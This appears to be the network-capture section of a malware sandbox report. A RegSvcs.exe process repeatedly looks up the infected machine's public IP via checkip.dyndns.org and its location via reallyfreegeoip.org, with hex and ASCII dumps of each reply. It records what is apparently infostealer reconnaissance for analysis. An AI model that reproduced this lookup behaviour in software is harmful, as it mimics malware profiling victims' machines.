    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 5c22cf59da77439e02f31bb7a2c233c0
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 15:34:38.416734934 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:38 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 5c22cf59da77439e02f31bb7a2c233c0
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49741 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:39.069367886 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:39.526000023 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:39 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: d7a77d1d145cef8642de3d5be1acac27
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49743 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:40.433010101 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:40.888156891 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:40 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 82810f43b621c3e679cba772f4b99f7e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID: 0 | Source IP: 192.168.2.5 | Source Port: 49705 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:13 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:13 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:13 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23312
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o6j%2BbE1PL6vlDG5jw7ViW%2Bw2yLYOdvXFcrkZXWQdjR41acugkm6sDGFVEDJQeoxMQXFo2T01nfq77z3m3ErG7DrAEzAwazIvmJUA1hJnJPI0rMRDR2%2FdfBVrBgh%2FJmq6Apg7JzJe"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b63f879e60ca4-EWR
2024-09-25 13:34:13 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:13 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 1 | Source IP: 192.168.2.5 | Source Port: 49706 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:14 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-09-25 13:34:14 UTC | 680 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:14 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23313
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q9cGDEOmg6bxp9ypCEtERbnrWTS%2Bt1jle3TELu8Yc49mGAm73LSOkmQ8cbiGpgjCCfVDWrsV3ia88v2kw9x%2B4ahIrXzZod38NzsjI%2Fj1kZONv%2BcwCPcOB9E%2Bm0ZxbVgRzB1nr0EY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b63fd5a5641e7-EWR
2024-09-25 13:34:14 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:14 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49708 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:15 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:15 UTC | 684 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:15 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23314
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zS4k%2BiwWLqF3wHz7SJgP9Lwp7znzbhH7rge4te5MAGbji%2FnWlUt2dRZG8bnYj%2BKvfu81kxeafhQPv%2FbTDm%2FPaTNigI1XqCRtlLXmgKZTa6kbZ%2FezgAWGf6dUzBAUqmPBbzaLn5n%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b64041c9f4228-EWR
2024-09-25 13:34:15 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:15 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49710 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:16 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:16 UTC | 670 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:16 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23315
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BDWlz6TpRHvlmpid2XQ15JZG8MbeKB5rQN9FluskF0FqnJnzz3dxQDyvublv8XTVG9qWl0YrjYt9HxioBipo2oC49KgI16FsNmrKMfjyi6lCcT3WW2azAkJT2qaVf17ZybIV9Ezk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b640b09ff436d-EWR
2024-09-25 13:34:16 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:16 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49712 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:17 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:18 UTC | 672 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:17 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23316
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rwal3WZpzOTvy2Ooy01S7wFrVTgesZaZM75kw4%2BXygDtjr6yHwQpKcJhChKPyWFCuIojCmKxENFX10PS50Mn43M7YGCSHLtNGRpAFxWLXp0yOmkcXoW5a06CjTueCOUZD3RPZxt2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b64125c018cc5-EWR
2024-09-25 13:34:18 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49714 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:18 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:19 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:19 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23318
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iHLvAQZof89dITE8bwIS7%2Bkpdr8vqho0sIMSoYxgKb3AryBmFwLCiT%2BWy9cuBm7CPYqvBMFWFQoPnXTCvsByWgbzVWqhLMlL66OI%2FH5Ez%2FW0LnAkLNvab7ceJetynPNnFdKULnKZ"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b641929654241-EWR
2024-09-25 13:34:19 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49716 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:20 UTC | 60 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
2024-09-25 13:34:20 UTC | 676 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:20 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23319
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Km4yE3oKvJ5%2BBeaN46QA1AUumIDmivaoQ1gBxGCF5pcuy2Fc6Vrl90hZPoi5tIzPGmG9vScr85qHErHB6uq%2BjG9u9d7GhUo8QfKY%2BnKWJIzlEYXt6HPktIp62CqbZCTVNr6W93He"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b64203eb343aa-EWR
2024-09-25 13:34:20 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49718 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:21 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:21 UTC | 688 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:21 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23320
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XKGcBVq9xxnKZNC83%2BLJ82FMRzexO1EweJPHBR1Ndlm%2Fa%2F3qbsvdFNiQ3%2BrJ%2Fq9EhF36MzTmyQLaFHp3P2x%2Bx3hvehEZkwjmc8Ql6qc%2BQuoBJ1wgR%2FtRAoeHcHUa6OC4PjM1%2FS2J"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b642709c8429b-EWR
2024-09-25 13:34:21 UTC | 340 | IN | Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-25 13:34:21 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49720 | Destination IP: 188.114.97.3 | Destination Port: 443 | PID: 6004 | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2024-09-25 13:34:22 UTC | 84 | OUT | GET /xml/8.46.123.33 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-09-25 13:34:22 UTC | 678 | IN | HTTP/1.1 200 OK
Date: Wed, 25 Sep 2024 13:34:22 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 23321
Last-Modified: Wed, 25 Sep 2024 07:05:41 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeBVWa00XKDqb1kNFNBXC8dwX2SocNpUfsVMc6k%2FOWM5584oWSZTSHcwA%2FxI4hOd3j8xnyOb7Qt3FCoQe%2Fd1wLCZolKGV09YsycG85TjX54HU6T1Xx6K%2Fjf1hx7LZBRiugCZ5AP6"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8c8b642ddcb880da-EWR
